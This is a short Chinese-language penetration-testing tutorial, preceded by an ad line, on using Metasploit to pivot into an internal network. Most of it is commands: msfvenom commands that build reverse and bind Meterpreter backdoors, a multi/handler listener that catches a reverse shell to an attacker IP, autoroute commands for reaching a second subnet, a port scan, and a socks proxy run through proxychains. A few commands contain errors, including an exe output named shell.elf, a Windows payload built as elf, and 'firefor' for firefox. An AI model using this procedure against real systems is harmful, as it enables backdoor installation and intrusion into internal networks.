合规国际互联网加速 OSASE为企业客户提供高速稳定SD-WAN国际加速解决方案。 广告
[TOC] ## Metasploit原理 利用msf生成后门,上传到DMZ跳板机,然后利用msf做监听,反弹shell回来,然后在路由器添加路由节点,快速可以进行内网漫游 ## 生成后门 ~~~ 反向 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.19.135 LPORT=5555 -f exe -o shell.elf 正向 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f elf -o shell.elf ~~~ ## 上传到边界机 ## 开启msf监听 ~~~ 进入msf模块 msfconsole 使用模块 use exploit/multi/handler 查看需要填写的内容 show options 填写需要的内容 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.19.135 set lport 5555 运行 run 后台运行 bg ~~~ ## 在meterpreter会话添加路由 * 扫描网段 ``` run get_local_subnets ``` * 添加路由可以访问该目标网段,从而达到二层内网渗透,把一层边界作为一个路由,让二层边界可以访问到攻击机,从而连接成功,拿到二层内网渗透 ``` run autoroute -s 192.168.6.0/24 ``` * 查看是否添加成功 ``` run autoroute -p 后台运行 ``` ## 端口扫描 ~~~ 搜索端口扫描版块 search portscan 选择模块 use 5 查看需要填写的内容 show options 填写需要的内容 set.... 运行 run ~~~ ## 在浏览器运行代理 ~~~ 搜索代理 search socks_proxy 选择模块 use 0 查看需要填写的内容 运行 run 设置代理工具 vim /etc/proxychains4.conf 浏览器运行 proxychains4 firefor ~~~